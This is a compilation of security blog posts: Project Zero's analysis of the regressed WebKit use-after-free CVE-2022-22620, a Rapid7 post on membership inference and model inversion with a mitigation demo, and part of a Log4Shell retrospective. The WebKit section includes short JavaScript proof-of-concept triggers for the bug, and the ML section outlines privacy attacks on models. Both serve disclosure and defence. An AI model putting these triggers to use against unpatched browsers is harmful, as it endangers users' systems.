This blog is the story of a \u201czombie\u201d Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you\u2019re interested in the full root cause analysis for CVE-2022-22620, we\u2019ve published it [here](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>).\n\nIn the [2020 Year in Review of 0-days exploited in the wild](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we\u2019re seeing a similar trend. Attackers don\u2019t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it\u2019s a little bit different from other variants that we\u2019ve discussed before. Most variants we\u2019ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.\n\n# Getting Started\n\nIn the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: [the patch](<https://github.com/WebKit/WebKit/commit/486816dc355c19f1de1b8056f85d0bbf7084dd6e>) (thanks to Apple for sharing with me!) and [the description from the security bulletin](<https://support.apple.com/en-us/HT213093>) stating that the vulnerability is a use-after-free. 
The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue*, to a reference-counted pointer, RefPtr<SerializedScriptValue>.\n\n[trunk/Source/WebCore/loader/FrameLoader.cpp](<https://trac.webkit.org/changeset/288539/webkit/trunk/Source/WebCore/loader/FrameLoader.cpp>), lines 1094-1096:\n\nBefore:\n\n// This does the same kind of work that didOpenURL does, except it relies on the fact\n// that a higher level already checked that the URLs match and the scrolling is the right thing to do.\nvoid FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)\n\nAfter:\n\n// This does the same kind of work that didOpenURL does, except it relies on the fact\n// that a higher level already checked that the URLs match and the scrolling is the right thing to do.\nvoid FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)\n\nWhenever I\u2019m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There\u2019s a lot of 0-days to be studied! \ud83d\ude00)\n\n# The Previous Life\n\nIn the case of CVE-2022-22620, I was scrolling through the [git blame](<https://git-scm.com/docs/git-blame>) view of FrameLoader.cpp. Specifically, I was looking at the [definition of loadInSameDocument](<https://github.com/WebKit/WebKit/blame/7b23cae2a1b1ffd026288f15261f8ba272c3b24b/Source/WebCore/loader/FrameLoader.cpp#L1096>). 
When looking at the git blame for this line prior to our patch, it\u2019s a very [interesting commit](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>). The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The [Changelog even states](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e#diff-9fb71b6fa7156160059b0216d05933e621d422df2b20f72ad7399eb946b8ba04>):\n\n \n(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the\n\nserialized script value state object. No one was passing ownership.\n\nBut pass it along to statePopped as a Ref since we need to pass ownership\n\nof the null value, at least for now.\n\nNow I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a [commit from 2013](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>) that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. 
The commit was titled \u201cUse-after-free in SerializedScriptValue::deserialize\u201d and included a good description of how that use-after-free worked.\n\nThe commit also included a test:\n\nAdded a test that demonstrated a crash due to use-after-free of SerializedScriptValue.\n\nTest: fast/history/replacestate-nocrash.html\n\nThe trigger from this test is:\n\nObject.prototype.__defineSetter__(\"foo\",function(){history.replaceState(\"\", \"\")});\nhistory.replaceState({foo:1,zzz:\"a\".repeat(1<<22)}, \"\");\nhistory.state.length;\n\nMy hope was that the test would crash the vulnerable version of WebKit and I\u2019d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn\u2019t crash.\n\nThe commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked [the Blink rendering engine in April 2013](<https://blog.chromium.org/2013/04/blink-rendering-engine-for-chromium.html>).) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the [Chromium bug](<https://bugs.chromium.org/p/chromium/issues/detail?id=171839>) back in 2013, so I asked him for the details.\n\nThe use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the \"most recent\" history entry.\n\nThe bug was that in the implementation of the getter for state, SerializedScriptValue::deserialize was called on the current \"most recent\" history entry value without increasing its reference count. 
As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.\n\nIn order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>. While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers\u2019 fix also caught and patched the path to deserialize through loadInSameDocument.\n\nThe timeline of the changes impacting the stateObject is:\n\n * [December 2009 - state object History API added.](<https://github.com/WebKit/WebKit/commit/e544495d282d4726fcb491e0e441ddba338b5ec1>)\n * HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>\n * HistoryItem::stateObject() returns SerializedScriptValue*\n * FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*\n * [January 2013 - Patching Sergei\u2019s bug](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>)\n * HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>\n * FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>\n * [September 2015- Deprecating use of PassRefPtr in history directory](<https://github.com/WebKit/WebKit/commit/ec83a53b569f6c2b493e9874a498cd1b683656a1>)\n * HistoryItem::stateObject returns RefPtr instead of PassRefPtr\n * [October 2016 - (Potentially) ad-hoc refactoring ](<https://github.com/WebKit/WebKit/commit/ed43edee9f8f114c3b2db3c0420e23f926a968ee>)\n * HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr\n * [December 
2016 - CVE-2022-22620 introduced](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>)\n * FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>\n * [January 2022 - CVE-2022-22620 patched](<https://github.com/WebKit/WebKit/commit/486816dc355c19f1de1b8056f85d0bbf7084dd6e>)\n * FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>\n\n# The Autopsy\n\nWhen we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is, why did the patch author think that loadInSameDocument would not need to hold a reference? From the [December 2016 commit ChangeLog](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>): Take a raw pointer for the serialized script value state object. No one was passing ownership.\n\nMy assessment is that it\u2019s due to the October 2016 changes in HistoryItem::stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject(), which as of October 2016 now returned a raw SerializedScriptValue* pointer. Looking at those two options for the type of the argument, it\u2019s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.\n\nSo why then was HistoryItem::stateObject\u2019s return value changed from a RefPtr to a raw pointer in October 2016? That I\u2019m struggling to find an explanation for. \n\nAccording to the description, the patch in October 2016 was intended to \u201cReplace all uses of ExceptionCodeWithMessage with WebCore::Exception\u201d. 
However, when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren\u2019t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they\u2019d do a little \u201cclean-up\u201d while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.\n\nWhile the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn\u2019t need to increase the reference count on the stateObject.\n\nBoth the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they\u2019re related to lifetime semantics.\n\n# The Zombie\n\nWe\u2019ve now tracked down the evolution of changes to fix the 2013 vulnerability\u2026and then revert those fixes\u2026 so I got back to identifying the 2022 bug. It\u2019s the same bug, but triggered through a different path. That\u2019s why the 2013 test case wasn\u2019t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:\n\n 1. The 2013 test case triggers the bug through the V8History::stateAccessorGetter path instead of FrameLoader::loadInSameDocument, and\n 2. 
As a part of Sergei\u2019s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization.\n\nTherefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.\n\nTo quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument:\n\n * [fast/history/multiple-back-forward-navigations.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/multiple-back-forward-navigations.html>)\n * [fast/history/history-traversal-is-asynchronous.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/history-traversal-is-asynchronous.html>)\n * [fast/history/history-back-forward-within-subframe-hash.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/history-back-forward-within-subframe-hash.html>)\n * [fast/history/link-inside-any.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/link-inside-any.html>)\n * [fast/history/timed-refresh-in-cached-frame.html](<https://github.com/WebKit/WebKit/blob/main/LayoutTests/fast/history/timed-refresh-in-cached-frame.html>)\n\nThe tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. 
loadInSameDocument is responsible for scrolling to that location.\n\nhistory.pushState(\"state1\", \"\", location + \"#foo\");\nhistory.pushState(\"state2\", \"\"); // current state\nhistory.back(); // goes back to state1, triggering loadInSameDocument\n\nNow that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped ([FrameLoader.cpp#1158](<https://github.com/WebKit/WebKit/blob/7b23cae2a1b1ffd026288f15261f8ba272c3b24b/Source/WebCore/loader/FrameLoader.cpp#L1158>)):\n\nm_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());\n\nThe callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the \u201cfreed\u201d object was \u201cused\u201d.\n\nIf you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like [CodeQL](<https://codeql.github.com/>) to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:\n\nFrameLoader::loadInSameDocument\n  FrameLoader::scrollToFragmentWithParentBoundary\n    FrameView::scrollToFragment\n      FrameView::scrollToFragmentInternal\n        FocusController::setFocusedElement\n          FocusController::setFocusedFrame\n            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));\n\nThe blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. 
If we\u2019re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.\n\nThe last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it\u2019s therefore free\u2019d. loadInSameDocument still uses the free\u2019d stateObject in its call to statePopped.\n\ninput = document.body.appendChild(document.createElement(\"input\"));\na = document.body.appendChild(document.createElement(\"a\"));\na.id = \"foo\";\nhistory.pushState(\"state1\", \"\", location + \"#foo\");\nhistory.pushState(\"state2\", \"\");\nsetTimeout(() => {\n  input.focus();\n  input.onblur = () => history.replaceState(\"state3\", \"\");\n  setTimeout(() => history.back(), 1000);\n}, 1000);\n\nIn both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.\n\n# Conclusion\n\nUsually when we talk about variants, they exist due to incomplete patches: the vendor doesn\u2019t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. 
We don\u2019t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.\n\nThere\u2019s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best practices: \n\n * Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.\n * Submitted a test case with the patch.\n * Wrote detailed commit messages explaining the vulnerability and how they were fixing it.\n * Added hardening measures during deserialization.\n\nAs an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, refactoring and security efforts that are generally under-appreciated and under-rewarded, and lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation. \n\nWhile this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we\u2019ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It\u2019s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches. 
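To make the ownership point of this post concrete, here is a small self-contained C++ model, added as an illustration; it is not WebKit code and not part of the Project Zero write-up. StateValue, RefPtr and HistoryItem are simplified stand-ins for SerializedScriptValue, WTF::RefPtr and HistoryItem, and the liveness registry stands in for the allocator so a dangling pointer can be reported instead of dereferenced. The two loadInSameDocument variants mirror the raw-pointer signature (December 2016 to January 2022) and the RefPtr-by-value signature (the 2013 and 2022 patches); the callback plays the role of the onblur handler calling history.replaceState().

```cpp
#include <cstdio>
#include <functional>
#include <set>
#include <string>
#include <utility>

// Registry of live objects, standing in for the allocator, so the demo can
// detect a dangling pointer without ever dereferencing freed memory.
static std::set<const void*> g_liveObjects;

// Minimal intrusively reference-counted value; a stand-in for WebKit's
// SerializedScriptValue. A new object starts with zero references and is
// deleted when its last reference is dropped.
class StateValue {
public:
    explicit StateValue(std::string data) : m_data(std::move(data)) { g_liveObjects.insert(this); }
    void ref() { ++m_refCount; }
    void deref() { if (--m_refCount == 0) delete this; }
    unsigned refCount() const { return m_refCount; }
    const std::string& data() const { return m_data; }
private:
    ~StateValue() { g_liveObjects.erase(this); }   // only deref() may delete
    std::string m_data;
    unsigned m_refCount = 0;
};

// Minimal owning smart pointer; a stand-in for WTF::RefPtr. Holding one
// keeps the object alive.
class RefPtr {
public:
    RefPtr() = default;
    explicit RefPtr(StateValue* p) : m_ptr(p) { if (m_ptr) m_ptr->ref(); }
    RefPtr(const RefPtr& other) : RefPtr(other.m_ptr) {}
    RefPtr& operator=(RefPtr other) { std::swap(m_ptr, other.m_ptr); return *this; }
    ~RefPtr() { if (m_ptr) m_ptr->deref(); }
    StateValue* get() const { return m_ptr; }
private:
    StateValue* m_ptr = nullptr;
};

// Stand-in for HistoryItem, which owns the current state object through a
// RefPtr (HistoryItem.m_stateObject in WebKit).
struct HistoryItem {
    RefPtr stateObject;
};

// User script that may run in the middle of the load. In the real bug this is
// the onblur handler reached via the blur event dispatched while scrolling.
using ScriptCallback = std::function<void(HistoryItem&)>;

// Models history.replaceState("state3", ""): the item takes a new state
// object, dropping what may be the last reference to the old one.
void replaceState(HistoryItem& item) {
    item.stateObject = RefPtr(new StateValue("state3"));
}

// Vulnerable shape: the callee takes a raw pointer and shares no ownership.
// If the callback frees the object, the final use (statePopped in WebKit)
// would read freed memory; here the registry is consulted first and the
// dangling pointer is reported instead of dereferenced.
std::string loadInSameDocumentRaw(HistoryItem& item, StateValue* stateObject,
                                  const ScriptCallback& userScript) {
    userScript(item);
    if (!g_liveObjects.count(stateObject))
        return "<use-after-free>";
    return stateObject->data();
}

// Fixed shape: taking a RefPtr by value means this frame holds its own
// reference for the whole call, so the callback cannot free the object out
// from under it.
std::string loadInSameDocumentRef(HistoryItem& item, RefPtr stateObject,
                                  const ScriptCallback& userScript) {
    userScript(item);
    return stateObject.get()->data();
}

// Drive the vulnerable path: the callback drops the only reference.
std::string runVulnerable() {
    HistoryItem item;
    item.stateObject = RefPtr(new StateValue("state1"));
    return loadInSameDocumentRaw(item, item.stateObject.get(), replaceState);
}

// Drive the fixed path: the object outlives the callback.
std::string runFixed() {
    HistoryItem item;
    item.stateObject = RefPtr(new StateValue("state1"));
    return loadInSameDocumentRef(item, item.stateObject, replaceState);
}

// True once every object allocated by the two runs has been released.
bool noLeaks() { return g_liveObjects.empty(); }

int main() {
    std::printf("raw pointer path : %s\n", runVulnerable().c_str());
    std::printf("RefPtr path      : %s\n", runFixed().c_str());
    std::printf("leaked objects   : %zu\n", g_liveObjects.size());
    return 0;
}
```

The comparison isolates what the December 2016 refactor changed: only the callee's signature decides whether the frame owns a reference across the callback, so a reviewer can catch this class of regression by asking whether any code reachable from the function (here, event dispatch during scrolling) can run script before the last use of the pointer.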
**Source:** Google Project Zero, "An Autopsy on a Zombie In-the-Wild 0-day" (published 2022-06-14; https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html; CVE-2022-22600, CVE-2022-22620)

---

**Source:** Rapid7 blog, "Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa's List" (published 2022-01-14; https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/; listed against CVE-2021-44228)

_**Editor's note:** We had planned to publish our [Hacky Holidays](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>) blog series throughout December 2021, but then [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide.
Now that it's 2022, we're feeling in need of some holiday cheer, and we hope you're still in the spirit of the season, too. Throughout January, we'll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let's pick up where we left off._

Santa's task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around [2.2 billion children in the world](<https://www.humanium.org/en/children-world/>). That's a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they'll be getting the gifts they've asked for or a lump of coal.

Santa's lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data: it's locked up tight. Santa has, however, made his model's API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.

Santa, being a just and equitable person, has already asked his data elves to tackle issues of [algorithmic bias](<https://en.wikipedia.org/wiki/Algorithmic_bias>). Unfortunately, these data elves have overlooked some issues in machine learning security: specifically, membership inference and model inversion.

## Membership inference attacks

Membership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, "Was this example in your training data?" Using the techniques of [Salem et al.](<https://arxiv.org/abs/1806.01246>) or a tool like [PrivacyRaven](<https://github.com/trailofbits/PrivacyRaven>), an attacker can train a model that figures out whether or not a model has seen an example before.

From a technical perspective, we know that there is some amount of memorization in models, so when they make their predictions, they are more likely to be confident on items they have seen before; in some ways, they "memorize" examples that have already been seen. We can then create a dataset for our "shadow" model, a model that approximates Santa's nice/naughty system, trained on data that we've collected and labeled ourselves.

We can then take the training data and label the outputs of this model with a "True" value (it was in the training dataset). Then, we can run some additional data through the model for inference, collect the outputs, and label them with a "False" value (it was not in the training dataset). It doesn't matter whether these in-training and out-of-training data points are nice or naughty, just that we know whether they were in the "shadow" training dataset or not. Using this "shadow" dataset, we train a simple model to answer the yes or no question: "Was this in the training data?" Then, we can turn our naughty algorithm against Santa's model: "Dear Santa, was this in your training dataset?" This lets us take real inputs to Santa's model and find out whether the model was trained on that data, effectively letting us de-anonymize the historical nice and naughty lists!

## Model inversion

Now, being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That's where model inversion comes in! [Fredrikson et al.](<https://www.cs.cmu.edu/~mfredrik/papers/fjr2015ccs.pdf>) proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of [Carlini et al.](<https://www.usenix.org/system/files/sec21-carlini-extracting.pdf>), who have managed to extract data from large language models like GPT-2.

In model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training-set-like outputs. In time, this will provide us with memorized training data.

Note that model inversion is a much heavier lift than membership inference and can't be done against all models all the time, but for models like Santa's, where the training data is so sensitive, it's worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa's list remains an open question.

## Mitigating model mayhem

Now, if you're on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model (or a very good approximation) needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely "naughty" or "nice" instead of returning the probabilities can make both attacks more difficult.

For extremely sensitive applications, the use of differential privacy or optimizing with [DPSGD](<https://arxiv.org/abs/1607.00133>) can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.

Santa making his list into a model will save him a whole lot of time, but if he's not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to.
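The mitigations above (label-only responses, per-client rate limiting, and logging the client, input, output and time of every query) shown against a confidence-threshold membership test, as an added example; this is not Rapid7's code, and the training rows, query points and the 1-nearest-neighbour classifier standing in for Santa's model are constructed for the example.

```python
"""Added example (not Rapid7's code): why a label-only, rate-limited, logged
API blunts membership inference against Santa's naughty/nice classifier.
Training rows, query points and the toy model are all constructed here."""
import math
import time
from collections import defaultdict, deque

# Constructed "historical list": (age, good deeds per month) -> label.
TRAINING = [((7, 12), "nice"), ((9, 10), "nice"),
            ((8, 1), "naughty"), ((10, 2), "naughty")]
# Constructed points that were never in the training data.
NON_MEMBERS = [(7, 11), (9, 9), (8, 3), (10, 4)]


def predict_with_confidence(x):
    """1-nearest-neighbour classifier standing in for Santa's model.  Like any
    memorising model it is most confident on points it has seen: confidence
    is exactly 1.0 at distance zero and falls off with distance."""
    best_label, best_d = None, math.inf
    for point, label in TRAINING:
        d = math.dist(point, x)
        if d < best_d:
            best_label, best_d = label, d
    return best_label, 1.0 / (1.0 + best_d)


def verbose_api(x):
    """The endpoint the post warns about: it returns the probability."""
    label, confidence = predict_with_confidence(x)
    return {"label": label, "confidence": confidence}


class HardenedApi:
    """Label-only answers, a per-client rate limit, and a query log carrying
    the fields the post recommends: client IP, input, output and time."""

    def __init__(self, max_per_window=20, window_s=60.0, clock=time.time):
        self.max_per_window = max_per_window
        self.window_s = window_s
        self.clock = clock                 # injectable so tests are deterministic
        self._recent = defaultdict(deque)  # client ip -> timestamps in window
        self.log = []

    def query(self, client_ip, x):
        now = self.clock()
        window = self._recent[client_ip]
        while window and now - window[0] > self.window_s:
            window.popleft()
        if len(window) >= self.max_per_window:
            self.log.append({"ip": client_ip, "input": x,
                             "output": "rate_limited", "time": now})
            return {"error": "rate limited"}
        window.append(now)
        label, _confidence = predict_with_confidence(x)  # confidence never leaves the server
        self.log.append({"ip": client_ip, "input": x, "output": label, "time": now})
        return {"label": label}


def guess_member(response, threshold=0.999):
    """Naive membership test: a confidence at or above the threshold suggests
    the point was memorised.  With no confidence field there is nothing to use."""
    return response.get("confidence", 0.0) >= threshold


def attack_accuracy(api):
    """Fraction of member/non-member points the threshold test gets right when
    it can only see what `api` returns; 0.5 is no better than guessing."""
    members = [point for point, _ in TRAINING]
    correct = sum(guess_member(api(p)) for p in members)
    correct += sum(not guess_member(api(p)) for p in NON_MEMBERS)
    return correct / (len(members) + len(NON_MEMBERS))
```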
As a best practice, Santa should:

 * Log information about queries, such as:
   * IP address
   * Input value
   * Output value
   * Time
 * Consider differentially private model training
 * Limit API access
 * Limit the information returned from the model to label-only

---

**Source:** Rapid7 blog, "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal" (published 2022-02-17; https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/; listed against CVE-2021-44228)

[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us, or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security
teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?

On Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.

## Laying out the landscape

Glenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:

 * The ability for vulnerable systems to grant an attacker full administrative access
 * The low level of skill required for exploitation; in many cases, attackers simply have to copy and paste
 * The attack vector's capability to run undetected over an encrypted channel
 * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat

Put all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).

But while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022, and 1,406 still awaiting confirmation from the vendor.

## Log4j today: A new normal?

So, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December, but we're by no means out of the woods.

"We're effectively out of fire-fighting mode," said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems, some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.

"Don't lose that momentum," Glenn chimed in. "Don't put that on your post-mortem action list and forget about it."

This imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.

